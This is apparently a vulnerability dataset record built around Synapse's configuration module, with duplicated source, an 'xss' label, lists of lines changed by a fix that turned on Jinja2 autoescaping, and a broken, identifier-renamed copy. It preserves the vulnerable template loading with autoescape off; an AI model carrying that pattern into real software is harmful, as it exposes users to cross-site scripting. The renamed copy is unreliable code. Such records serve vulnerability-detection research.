def invoke_all_static(cls, func_name: str, *args, **kwargs):
"""
Invoke a static function on config objects this RootConfig is
configured to use.
Args:
func_name: Name of function to invoke
*args
**kwargs
Returns:
ordered dictionary of config section name and the result of the
function from it.
"""
for config in cls.config_classes:
if hasattr(config, func_name):
getattr(config, func_name)(*args, **kwargs)
def generate_config(
self,
config_dir_path,
data_dir_path,
server_name,
generate_secrets=False,
report_stats=None,
open_private_ports=False,
listeners=None,
tls_certificate_path=None,
tls_private_key_path=None,
acme_domain=None,
):
"""
Build a default configuration file
This is used when the user explicitly asks us to generate a config file
(eg with --generate_config).
Args:
config_dir_path (str): The path where the config files are kept. Used to
create filenames for things like the log config and the signing key.
data_dir_path (str): The path where the data files are kept. Used to create
filenames for things like the database and media store.
server_name (str): The server name. Used to initialise the server_name
config param, but also used in the names of some of the config files.
generate_secrets (bool): True if we should generate new secrets for things
like the macaroon_secret_key. If False, these parameters will be left
unset.
report_stats (bool|None): Initial setting for the report_stats setting.
If None, report_stats will be left unset.
open_private_ports (bool): True to leave private ports (such as the non-TLS
HTTP listener) open to the internet.
listeners (list(dict)|None): A list of descriptions of the listeners
synapse should start with each of which specifies a port (str), a list of
resources (list(str)), tls (bool) and type (str). For example:
[{
"port": 8448,
"resources": [{"names": ["federation"]}],
"tls": True,
"type": "http",
},
{
"port": 443,
"resources": [{"names": ["client"]}],
"tls": False,
"type": "http",
}],
database (str|None): The database type to configure, either `psycog2`
or `sqlite3`.
tls_certificate_path (str|None): The path to the tls certificate.
tls_private_key_path (str|None): The path to the tls private key.
acme_domain (str|None): The domain acme will try to validate. If
specified acme will be enabled.
Returns:
str: the yaml config file
"""
return CONFIG_FILE_HEADER + "\n\n".join(
dedent(conf)
for conf in self.invoke_all(
"generate_config_section",
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
server_name=server_name,
generate_secrets=generate_secrets,
report_stats=report_stats,
open_private_ports=open_private_ports,
listeners=listeners,
tls_certificate_path=tls_certificate_path,
tls_private_key_path=tls_private_key_path,
acme_domain=acme_domain,
).values()
)
@classmethod
def load_config(cls, description, argv):
"""Parse the commandline and config files
Doesn't support config-file-generation: used by the worker apps.
Returns: Config object.
"""
config_parser = argparse.ArgumentParser(description=description)
cls.add_arguments_to_parser(config_parser)
obj, _ = cls.load_config_with_parser(config_parser, argv)
return obj
@classmethod
def add_arguments_to_parser(cls, config_parser):
"""Adds all the config flags to an ArgumentParser.
Doesn't support config-file-generation: used by the worker apps.
Used for workers where we want to add extra flags/subcommands.
Args:
config_parser (ArgumentParser): App description
"""
config_parser.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml files.",
)
config_parser.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where files such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
cls.invoke_all_static("add_arguments", config_parser)
@classmethod
def load_config_with_parser(cls, parser, argv):
"""Parse the commandline and config files with the given parser
Doesn't support config-file-generation: used by the worker apps.
Used for workers where we want to add extra flags/subcommands.
Args:
parser (ArgumentParser)
argv (list[str])
Returns:
tuple[HomeServerConfig, argparse.Namespace]: Returns the parsed
config object and the parsed argparse.Namespace object from
`parser.parse_args(..)`
"""
obj = cls()
config_args = parser.parse_args(argv)
config_files = find_config_files(search_paths=config_args.config_path)
if not config_files:
parser.error("Must supply a config file.")
if config_args.keys_directory:
config_dir_path = config_args.keys_directory
else:
config_dir_path = os.path.dirname(config_files[-1])
config_dir_path = os.path.abspath(config_dir_path)
data_dir_path = os.getcwd()
config_dict = read_config_files(config_files)
obj.parse_config_dict(
config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
)
obj.invoke_all("read_arguments", config_args)
return obj, config_args
@classmethod
def load_or_generate_config(cls, description, argv):
"""Parse the commandline and config files
Supports generation of config files, so is used for the main homeserver app.
Returns: Config object, or None if --generate-config or --generate-keys was set
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml files.",
)
generate_group = parser.add_argument_group("Config generation")
generate_group.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
generate_group.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config files, then exit.",
)
generate_group.add_argument(
"-H", "--server-name", help="The server name to generate a config file for."
)
generate_group.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
generate_group.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config files such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
generate_group.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
generate_group.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
cls.invoke_all_static("add_arguments", parser)
config_args = parser.parse_args(argv)
config_files = find_config_files(search_paths=config_args.config_path)
if not config_files:
parser.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if config_args.config_directory:
config_dir_path = config_args.config_directory
else:
config_dir_path = os.path.dirname(config_files[-1])
config_dir_path = os.path.abspath(config_dir_path)
data_dir_path = os.getcwd()
generate_missing_configs = config_args.generate_missing_configs
obj = cls()
if config_args.generate_config:
if config_args.report_stats is None:
parser.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ MISSING_REPORT_STATS_SPIEL
)
(config_path,) = config_files
if not path_exists(config_path):
print("Generating config file %s" % (config_path,))
if config_args.data_directory:
data_dir_path = config_args.data_directory
else:
data_dir_path = os.getcwd()
data_dir_path = os.path.abspath(data_dir_path)
server_name = config_args.server_name
if not server_name:
raise ConfigError(
"Must specify a server_name to a generate config for."
" Pass -H server.name."
)
config_str = obj.generate_config(
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
server_name=server_name,
report_stats=(config_args.report_stats == "yes"),
generate_secrets=True,
open_private_ports=config_args.open_private_ports,
)
if not path_exists(config_dir_path):
os.makedirs(config_dir_path)
with open(config_path, "w") as config_file:
config_file.write(config_str)
config_file.write("\n\n# vim:ft=yaml")
config_dict = yaml.safe_load(config_str)
obj.generate_missing_files(config_dict, config_dir_path)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (config_path, server_name)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" files."
)
% (config_path,)
)
generate_missing_configs = True
config_dict = read_config_files(config_files)
if generate_missing_configs:
obj.generate_missing_files(config_dict, config_dir_path)
return None
obj.parse_config_dict(
config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
)
obj.invoke_all("read_arguments", config_args)
return obj
def parse_config_dict(self, config_dict, config_dir_path=None, data_dir_path=None):
"""Read the information from the config dict into this Config object.
Args:
config_dict (dict): Configuration data, as read from the yaml
config_dir_path (str): The path where the config files are kept. Used to
create filenames for things like the log config and the signing key.
data_dir_path (str): The path where the data files are kept. Used to create
filenames for things like the database and media store.
"""
self.invoke_all(
"read_config",
config_dict,
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
)
def generate_missing_files(self, config_dict, config_dir_path):
self.invoke_all("generate_files", config_dict, config_dir_path)
def read_config_files(config_files):
"""Read the config files into a dict
Args:
config_files (iterable[str]): A list of the config files to read
Returns: dict
"""
specified_config = {}
for config_file in config_files:
with open(config_file) as file_stream:
yaml_config = yaml.safe_load(file_stream)
if not isinstance(yaml_config, dict):
err = "File %r is empty or doesn't parse into a key-value map. IGNORING."
print(err % (config_file,))
continue
specified_config.update(yaml_config)
if "server_name" not in specified_config:
raise ConfigError(MISSING_SERVER_NAME)
if "report_stats" not in specified_config:
raise ConfigError(
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS + "\n" + MISSING_REPORT_STATS_SPIEL
)
return specified_config
def find_config_files(search_paths):
"""Finds config files using a list of search paths. If a path is a file
then that file path is added to the list. If a search path is a directory
then all the "*.yaml" files in that directory are added to the list in
sorted order.
Args:
search_paths(list(str)): A list of paths to search.
Returns:
list(str): A list of file paths.
"""
config_files = []
if search_paths:
for config_path in search_paths:
if os.path.isdir(config_path):
# We accept specifying directories as config paths, we search
# inside that directory for all files matching *.yaml, and then
# we apply them in *sorted* order.
files = []
for entry in os.listdir(config_path):
entry_path = os.path.join(config_path, entry)
if not os.path.isfile(entry_path):
err = "Found subdirectory in config directory: %r. IGNORING."
print(err % (entry_path,))
continue
if not entry.endswith(".yaml"):
err = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(err % (entry_path,))
continue
files.append(entry_path)
config_files.extend(sorted(files))
else:
config_files.append(config_path)
return config_files
@attr.s
class ShardedWorkerHandlingConfig:
"""Algorithm for choosing which instance is responsible for handling some
sharded work.
For example, the federation senders use this to determine which instances
handles sending stuff to a given destination (which is used as the `key`
below).
"""
instances = attr.ib(type=List[str])
def should_handle(self, instance_name: str, key: str) -> bool:
"""Whether this instance is responsible for handling the given key.
"""
# If multiple instances are not defined we always return true
if not self.instances or len(self.instances) == 1:
return True
return self.get_instance(key) == instance_name
def get_instance(self, key: str) -> str:
"""Get the instance responsible for handling the given key.
Note: For things like federation sending the config for which instance
is sending is known only to the sender instance if there is only one.
Therefore `should_handle` should be used where possible.
"""
if not self.instances:
return "master"
if len(self.instances) == 1:
return self.instances[0]
# We shard by taking the hash, modulo it by the number of instances and
# then checking whether this instance matches the instance at that
# index.
#
# (Technically this introduces some bias and is not entirely uniform,
# but since the hash is so large the bias is ridiculously small).
dest_hash = sha256(key.encode("utf8")).digest()
dest_int = int.from_bytes(dest_hash, byteorder="little")
remainder = dest_int % (len(self.instances))
return self.instances[remainder]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class ConfigError(Exception):
"""Represents a problem parsing the configuration
Args:
msg: A textual description of the error.
path: Where appropriate, an indication of where in the configuration
the problem lies.
"""
def __init__(self, msg: str, path: Optional[Iterable[str]] = None):
self.msg = msg
self.path = path
# We split these messages out to allow packages to override with package
# specific instructions.
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `report_stats` key in your config file to either True or False.
"""
MISSING_REPORT_STATS_SPIEL = """\
We would really appreciate it if you could help our project out by reporting
anonymized usage statistics from your homeserver. Only very basic aggregate
data (e.g. number of users) will be reported, but it helps us to track the
growth of the Matrix community, and helps us to make Matrix a success, as well
as to convince other networks that they should peer with us.
Thank you.
"""
MISSING_SERVER_NAME = """\
Missing mandatory `server_name` config option.
"""
CONFIG_FILE_HEADER = """\
# Configuration file for Synapse.
#
# This is a YAML file: see [1] for a quick introduction. Note in particular
# that *indentation is important*: all the elements of a list or dictionary
# should have the same indentation.
#
# [1] https://docs.ansible.com/ansible/latest/reference_appendices/YAMLSyntax.html
"""
def path_exists(file_path):
"""Check if a file exists
Unlike os.path.exists, this throws an exception if there is an error
checking if the file exists (for example, if there is a perms error on
the parent dir).
Returns:
bool: True if the file exists; False if not.
"""
try:
os.stat(file_path)
return True
except OSError as e:
if e.errno != errno.ENOENT:
raise e
return False
class Config:
"""
A configuration section, containing configuration keys and values.
Attributes:
section (str): The section title of this config object, such as
"tls" or "logger". This is used to refer to it on the root
logger (for example, `config.tls.some_option`). Must be
defined in subclasses.
"""
section = None
def __init__(self, root_config=None):
self.root = root_config
# Get the path to the default Synapse template directory
self.default_template_dir = pkg_resources.resource_filename(
"synapse", "res/templates"
)
def __getattr__(self, item: str) -> Any:
"""
Try and fetch a configuration option that does not exist on this class.
This is so that existing configs that rely on `self.value`, where value
is actually from a different config section, continue to work.
"""
if item in ["generate_config_section", "read_config"]:
raise AttributeError(item)
if self.root is None:
raise AttributeError(item)
else:
return self.root._get_unclassed_config(self.section, item)
@staticmethod
def parse_size(value):
if isinstance(value, int):
return value
sizes = {"K": 1024, "M": 1024 * 1024}
size = 1
suffix = value[-1]
if suffix in sizes:
value = value[:-1]
size = sizes[suffix]
return int(value) * size
@staticmethod
def parse_duration(value):
if isinstance(value, int):
return value
second = 1000
minute = 60 * second
hour = 60 * minute
day = 24 * hour
week = 7 * day
year = 365 * day
sizes = {"s": second, "m": minute, "h": hour, "d": day, "w": week, "y": year}
size = 1
suffix = value[-1]
if suffix in sizes:
value = value[:-1]
size = sizes[suffix]
return int(value) * size
@staticmethod
def abspath(file_path):
return os.path.abspath(file_path) if file_path else file_path
@classmethod
def path_exists(cls, file_path):
return path_exists(file_path)
@classmethod
def check_file(cls, file_path, config_name):
if file_path is None:
raise ConfigError("Missing config for %s." % (config_name,))
try:
os.stat(file_path)
except OSError as e:
raise ConfigError(
"Error accessing file '%s' (config for %s): %s"
% (file_path, config_name, e.strerror)
)
return cls.abspath(file_path)
@classmethod
def ensure_directory(cls, dir_path):
dir_path = cls.abspath(dir_path)
try:
os.makedirs(dir_path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
if not os.path.isdir(dir_path):
raise ConfigError("%s is not a directory" % (dir_path,))
return dir_path
@classmethod
def read_file(cls, file_path, config_name):
cls.check_file(file_path, config_name)
with open(file_path) as file_stream:
return file_stream.read()
def read_template(self, filename: str) -> jinja2.Template:
"""Load a template file from disk.
This function will attempt to load the given template from the default Synapse
template directory.
Files read are treated as Jinja templates. The templates is not rendered yet
and has autoescape enabled.
Args:
filename: A template filename to read.
Raises:
ConfigError: if the file's path is incorrect or otherwise cannot be read.
Returns:
A jinja2 template.
"""
return self.read_templates([filename])[0]
def read_templates(
self, filenames: List[str], custom_template_directory: Optional[str] = None,
) -> List[jinja2.Template]:
"""Load a list of template files from disk using the given variables.
This function will attempt to load the given templates from the default Synapse
template directory. If `custom_template_directory` is supplied, that directory
is tried first.
Files read are treated as Jinja templates. The templates are not rendered yet
and have autoescape enabled.
Args:
filenames: A list of template filenames to read.
custom_template_directory: A directory to try to look for the templates
before using the default Synapse template directory instead.
Raises:
ConfigError: if the file's path is incorrect or otherwise cannot be read.
Returns:
A list of jinja2 templates.
"""
search_directories = [self.default_template_dir]
# The loader will first look in the custom template directory (if specified) for the
# given filename. If it doesn't find it, it will use the default template dir instead
if custom_template_directory:
# Check that the given template directory exists
if not self.path_exists(custom_template_directory):
raise ConfigError(
"Configured template directory does not exist: %s"
% (custom_template_directory,)
)
# Search the custom template directory as well
search_directories.insert(0, custom_template_directory)
loader = jinja2.FileSystemLoader(search_directories)
env = jinja2.Environment(loader=loader, autoescape=jinja2.select_autoescape(),)
# Update the environment with our custom filters
env.filters.update(
{
"format_ts": _format_ts_filter,
"mxc_to_http": _create_mxc_to_http_filter(self.public_baseurl),
}
)
# Load the templates
return [env.get_template(filename) for filename in filenames]
def _format_ts_filter(value: int, format: str):
return time.strftime(format, time.localtime(value / 1000))
def _create_mxc_to_http_filter(public_baseurl: str) -> Callable:
"""Create and return a jinja2 filter that converts MXC urls to HTTP
Args:
public_baseurl: The public, accessible base URL of the homeserver
"""
def mxc_to_http_filter(value, width, height, resize_method="crop"):
if value[0:6] != "mxc://":
return ""
server_and_media_id = value[6:]
fragment = None
if "#" in server_and_media_id:
server_and_media_id, fragment = server_and_media_id.split("#", 1)
fragment = "#" + fragment
params = {"width": width, "height": height, "method": resize_method}
return "%s_matrix/media/v1/thumbnail/%s?%s%s" % (
public_baseurl,
server_and_media_id,
urllib.parse.urlencode(params),
fragment or "",
)
return mxc_to_http_filter
class RootConfig:
"""
Holder of an application's configuration.
What configuration this object holds is defined by `config_classes`, a list
of Config classes that will be instantiated and given the contents of a
configuration file to read. They can then be accessed on this class by their
section name, defined in the Config or dynamically set to be the name of the
class, lower-cased and with "Config" removed.
"""
config_classes = []
def __init__(self):
self._configs = OrderedDict()
for config_class in self.config_classes:
if config_class.section is None:
raise ValueError("%r requires a section name" % (config_class,))
try:
conf = config_class(self)
except Exception as e:
raise Exception("Failed making %s: %r" % (config_class.section, e))
self._configs[config_class.section] = conf
def __getattr__(self, item: str) -> Any:
"""
Redirect lookups on this object either to config objects, or values on
config objects, so that `config.tls.blah` works, as well as legacy uses
of things like `config.server_name`. It will first look up the config
section name, and then values on those config classes.
"""
if item in self._configs.keys():
return self._configs[item]
return self._get_unclassed_config(None, item)
def _get_unclassed_config(self, asking_section: Optional[str], item: str):
"""
Fetch a config value from one of the instantiated config classes that
has not been fetched directly.
Args:
asking_section: If this check is coming from a Config child, which
one? This section will not be asked if it has the value.
item: The configuration value key.
Raises:
AttributeError if no config classes have the config key. The body
will contain what sections were checked.
"""
for key, val in self._configs.items():
if key == asking_section:
continue
if item in dir(val):
return getattr(val, item)
raise AttributeError(item, "not found in %s" % (list(self._configs.keys()),))
def invoke_all(self, func_name: str, *args, **kwargs) -> MutableMapping[str, Any]:
"""
Invoke a function on all instantiated config objects this RootConfig is
configured to use.
Args:
func_name: Name of function to invoke
*args
**kwargs
Returns:
ordered dictionary of config section name and the result of the
function from it.
"""
res = OrderedDict()
for name, config in self._configs.items():
if hasattr(config, func_name):
res[name] = getattr(config, func_name)(*args, **kwargs)
return res
@classmethod
def invoke_all_static(cls, func_name: str, *args, **kwargs):
"""
Invoke a static function on config objects this RootConfig is
configured to use.
Args:
func_name: Name of function to invoke
*args
**kwargs
Returns:
ordered dictionary of config section name and the result of the
function from it.
"""
for config in cls.config_classes:
if hasattr(config, func_name):
getattr(config, func_name)(*args, **kwargs)
def generate_config(
self,
config_dir_path,
data_dir_path,
server_name,
generate_secrets=False,
report_stats=None,
open_private_ports=False,
listeners=None,
tls_certificate_path=None,
tls_private_key_path=None,
acme_domain=None,
):
"""
Build a default configuration file
This is used when the user explicitly asks us to generate a config file
(eg with --generate_config).
Args:
config_dir_path (str): The path where the config files are kept. Used to
create filenames for things like the log config and the signing key.
data_dir_path (str): The path where the data files are kept. Used to create
filenames for things like the database and media store.
server_name (str): The server name. Used to initialise the server_name
config param, but also used in the names of some of the config files.
generate_secrets (bool): True if we should generate new secrets for things
like the macaroon_secret_key. If False, these parameters will be left
unset.
report_stats (bool|None): Initial setting for the report_stats setting.
If None, report_stats will be left unset.
open_private_ports (bool): True to leave private ports (such as the non-TLS
HTTP listener) open to the internet.
listeners (list(dict)|None): A list of descriptions of the listeners
synapse should start with each of which specifies a port (str), a list of
resources (list(str)), tls (bool) and type (str). For example:
[{
"port": 8448,
"resources": [{"names": ["federation"]}],
"tls": True,
"type": "http",
},
{
"port": 443,
"resources": [{"names": ["client"]}],
"tls": False,
"type": "http",
}],
database (str|None): The database type to configure, either `psycog2`
or `sqlite3`.
tls_certificate_path (str|None): The path to the tls certificate.
tls_private_key_path (str|None): The path to the tls private key.
acme_domain (str|None): The domain acme will try to validate. If
specified acme will be enabled.
Returns:
str: the yaml config file
"""
return CONFIG_FILE_HEADER + "\n\n".join(
dedent(conf)
for conf in self.invoke_all(
"generate_config_section",
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
server_name=server_name,
generate_secrets=generate_secrets,
report_stats=report_stats,
open_private_ports=open_private_ports,
listeners=listeners,
tls_certificate_path=tls_certificate_path,
tls_private_key_path=tls_private_key_path,
acme_domain=acme_domain,
).values()
)
@classmethod
def load_config(cls, description, argv):
"""Parse the commandline and config files
Doesn't support config-file-generation: used by the worker apps.
Returns: Config object.
"""
config_parser = argparse.ArgumentParser(description=description)
cls.add_arguments_to_parser(config_parser)
obj, _ = cls.load_config_with_parser(config_parser, argv)
return obj
@classmethod
def add_arguments_to_parser(cls, config_parser):
"""Adds all the config flags to an ArgumentParser.
Doesn't support config-file-generation: used by the worker apps.
Used for workers where we want to add extra flags/subcommands.
Args:
config_parser (ArgumentParser): App description
"""
config_parser.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml files.",
)
config_parser.add_argument(
"--keys-directory",
metavar="DIRECTORY",
help="Where files such as certs and signing keys are stored when"
" their location is not given explicitly in the config."
" Defaults to the directory containing the last config file",
)
cls.invoke_all_static("add_arguments", config_parser)
@classmethod
def load_config_with_parser(cls, parser, argv):
"""Parse the commandline and config files with the given parser
Doesn't support config-file-generation: used by the worker apps.
Used for workers where we want to add extra flags/subcommands.
Args:
parser (ArgumentParser)
argv (list[str])
Returns:
tuple[HomeServerConfig, argparse.Namespace]: Returns the parsed
config object and the parsed argparse.Namespace object from
`parser.parse_args(..)`
"""
obj = cls()
config_args = parser.parse_args(argv)
config_files = find_config_files(search_paths=config_args.config_path)
if not config_files:
parser.error("Must supply a config file.")
if config_args.keys_directory:
config_dir_path = config_args.keys_directory
else:
config_dir_path = os.path.dirname(config_files[-1])
config_dir_path = os.path.abspath(config_dir_path)
data_dir_path = os.getcwd()
config_dict = read_config_files(config_files)
obj.parse_config_dict(
config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
)
obj.invoke_all("read_arguments", config_args)
return obj, config_args
@classmethod
def load_or_generate_config(cls, description, argv):
"""Parse the commandline and config files
Supports generation of config files, so is used for the main homeserver app.
Returns: Config object, or None if --generate-config or --generate-keys was set
"""
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"-c",
"--config-path",
action="append",
metavar="CONFIG_FILE",
help="Specify config file. Can be given multiple times and"
" may specify directories containing *.yaml files.",
)
generate_group = parser.add_argument_group("Config generation")
generate_group.add_argument(
"--generate-config",
action="store_true",
help="Generate a config file, then exit.",
)
generate_group.add_argument(
"--generate-missing-configs",
"--generate-keys",
action="store_true",
help="Generate any missing additional config files, then exit.",
)
generate_group.add_argument(
"-H", "--server-name", help="The server name to generate a config file for."
)
generate_group.add_argument(
"--report-stats",
action="store",
help="Whether the generated config reports anonymized usage statistics.",
choices=["yes", "no"],
)
generate_group.add_argument(
"--config-directory",
"--keys-directory",
metavar="DIRECTORY",
help=(
"Specify where additional config files such as signing keys and log"
" config should be stored. Defaults to the same directory as the last"
" config file."
),
)
generate_group.add_argument(
"--data-directory",
metavar="DIRECTORY",
help=(
"Specify where data such as the media store and database file should be"
" stored. Defaults to the current working directory."
),
)
generate_group.add_argument(
"--open-private-ports",
action="store_true",
help=(
"Leave private ports (such as the non-TLS HTTP listener) open to the"
" internet. Do not use this unless you know what you are doing."
),
)
cls.invoke_all_static("add_arguments", parser)
config_args = parser.parse_args(argv)
config_files = find_config_files(search_paths=config_args.config_path)
if not config_files:
parser.error(
"Must supply a config file.\nA config file can be automatically"
' generated using "--generate-config -H SERVER_NAME'
' -c CONFIG-FILE"'
)
if config_args.config_directory:
config_dir_path = config_args.config_directory
else:
config_dir_path = os.path.dirname(config_files[-1])
config_dir_path = os.path.abspath(config_dir_path)
data_dir_path = os.getcwd()
generate_missing_configs = config_args.generate_missing_configs
obj = cls()
if config_args.generate_config:
if config_args.report_stats is None:
parser.error(
"Please specify either --report-stats=yes or --report-stats=no\n\n"
+ MISSING_REPORT_STATS_SPIEL
)
(config_path,) = config_files
if not path_exists(config_path):
print("Generating config file %s" % (config_path,))
if config_args.data_directory:
data_dir_path = config_args.data_directory
else:
data_dir_path = os.getcwd()
data_dir_path = os.path.abspath(data_dir_path)
server_name = config_args.server_name
if not server_name:
raise ConfigError(
"Must specify a server_name to a generate config for."
" Pass -H server.name."
)
config_str = obj.generate_config(
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
server_name=server_name,
report_stats=(config_args.report_stats == "yes"),
generate_secrets=True,
open_private_ports=config_args.open_private_ports,
)
if not path_exists(config_dir_path):
os.makedirs(config_dir_path)
with open(config_path, "w") as config_file:
config_file.write(config_str)
config_file.write("\n\n# vim:ft=yaml")
config_dict = yaml.safe_load(config_str)
obj.generate_missing_files(config_dict, config_dir_path)
print(
(
"A config file has been generated in %r for server name"
" %r. Please review this file and customise it"
" to your needs."
)
% (config_path, server_name)
)
return
else:
print(
(
"Config file %r already exists. Generating any missing config"
" files."
)
% (config_path,)
)
generate_missing_configs = True
config_dict = read_config_files(config_files)
if generate_missing_configs:
obj.generate_missing_files(config_dict, config_dir_path)
return None
obj.parse_config_dict(
config_dict, config_dir_path=config_dir_path, data_dir_path=data_dir_path
)
obj.invoke_all("read_arguments", config_args)
return obj
def parse_config_dict(self, config_dict, config_dir_path=None, data_dir_path=None):
"""Read the information from the config dict into this Config object.
Args:
config_dict (dict): Configuration data, as read from the yaml
config_dir_path (str): The path where the config files are kept. Used to
create filenames for things like the log config and the signing key.
data_dir_path (str): The path where the data files are kept. Used to create
filenames for things like the database and media store.
"""
self.invoke_all(
"read_config",
config_dict,
config_dir_path=config_dir_path,
data_dir_path=data_dir_path,
)
def generate_missing_files(self, config_dict, config_dir_path):
self.invoke_all("generate_files", config_dict, config_dir_path)
def read_config_files(config_files):
"""Read the config files into a dict
Args:
config_files (iterable[str]): A list of the config files to read
Returns: dict
"""
specified_config = {}
for config_file in config_files:
with open(config_file) as file_stream:
yaml_config = yaml.safe_load(file_stream)
if not isinstance(yaml_config, dict):
err = "File %r is empty or doesn't parse into a key-value map. IGNORING."
print(err % (config_file,))
continue
specified_config.update(yaml_config)
if "server_name" not in specified_config:
raise ConfigError(MISSING_SERVER_NAME)
if "report_stats" not in specified_config:
raise ConfigError(
MISSING_REPORT_STATS_CONFIG_INSTRUCTIONS + "\n" + MISSING_REPORT_STATS_SPIEL
)
return specified_config
def find_config_files(search_paths):
"""Finds config files using a list of search paths. If a path is a file
then that file path is added to the list. If a search path is a directory
then all the "*.yaml" files in that directory are added to the list in
sorted order.
Args:
search_paths(list(str)): A list of paths to search.
Returns:
list(str): A list of file paths.
"""
config_files = []
if search_paths:
for config_path in search_paths:
if os.path.isdir(config_path):
# We accept specifying directories as config paths, we search
# inside that directory for all files matching *.yaml, and then
# we apply them in *sorted* order.
files = []
for entry in os.listdir(config_path):
entry_path = os.path.join(config_path, entry)
if not os.path.isfile(entry_path):
err = "Found subdirectory in config directory: %r. IGNORING."
print(err % (entry_path,))
continue
if not entry.endswith(".yaml"):
err = (
"Found file in config directory that does not end in "
"'.yaml': %r. IGNORING."
)
print(err % (entry_path,))
continue
files.append(entry_path)
config_files.extend(sorted(files))
else:
config_files.append(config_path)
return config_files
@attr.s
class ShardedWorkerHandlingConfig:
"""Algorithm for choosing which instance is responsible for handling some
sharded work.
For example, the federation senders use this to determine which instances
handles sending stuff to a given destination (which is used as the `key`
below).
"""
instances = attr.ib(type=List[str])
def should_handle(self, instance_name: str, key: str) -> bool:
"""Whether this instance is responsible for handling the given key.
"""
# If multiple instances are not defined we always return true
if not self.instances or len(self.instances) == 1:
return True
return self.get_instance(key) == instance_name
def get_instance(self, key: str) -> str:
"""Get the instance responsible for handling the given key.
Note: For things like federation sending the config for which instance
is sending is known only to the sender instance if there is only one.
Therefore `should_handle` should be used where possible.
"""
if not self.instances:
return "master"
if len(self.instances) == 1:
return self.instances[0]
# We shard by taking the hash, modulo it by the number of instances and
# then checking whether this instance matches the instance at that
# index.
#
# (Technically this introduces some bias and is not entirely uniform,
# but since the hash is so large the bias is ridiculously small).
dest_hash = sha256(key.encode("utf8")).digest()
dest_int = int.from_bytes(dest_hash, byteorder="little")
remainder = dest_int % (len(self.instances))
return self.instances[remainder]
__all__ = ["Config", "RootConfig", "ShardedWorkerHandlingConfig"]
| xss | {
"code": [
" self,",
" filenames: List[str],",
" custom_template_directory: Optional[str] = None,",
" autoescape: bool = False,",
" autoescape: Whether to autoescape variables before inserting them into the",
" templates = []",
" env = jinja2.Environment(loader=loader, autoescape=autoescape)",
" for filename in filenames:",
" template = env.get_template(filename)",
" templates.append(template)",
" return templates"
],
"line_no": [
207,
208,
209,
210,
226,
235,
252,
262,
264,
265,
267
]
} | {
"code": [
" def read_template(self, filename: str) -> jinja2.Template:",
" \"\"\"Load a template file from disk.",
" This function will attempt to load the given template from the default Synapse",
" template directory.",
" and has autoescape enabled.",
" filename: A template filename to read.",
" ConfigError: if the file's path is incorrect or otherwise cannot be read.",
" A jinja2 template.",
" return self.read_templates([filename])[0]",
" Files read are treated as Jinja templates. The templates are not rendered yet",
" and have autoescape enabled.",
" return [env.get_template(filename) for filename in filenames]"
],
"line_no": [
206,
207,
209,
210,
213,
216,
219,
222,
224,
235,
236,
277
]
} |
import argparse
import .errno
import os
import time
import urllib.parse
from collections import OrderedDict
from hashlib import sha256
from textwrap import dedent
from typing import Any, Callable, Iterable, List, MutableMapping, Optional
import attr
import jinja2
import pkg_resources
import yaml
class CLASS_0(Exception):
def __init__(self, VAR_10: str, VAR_11: Optional[Iterable[str]] = None):
self.msg = VAR_10
self.path = VAR_11
VAR_0 = """\
Please opt in or out of reporting anonymized homeserver usage statistics, by
setting the `VAR_33` VAR_47 in your config file to either True or False.
"""
VAR_1 = """\
We would really appreciate it if you could help our project out by reporting
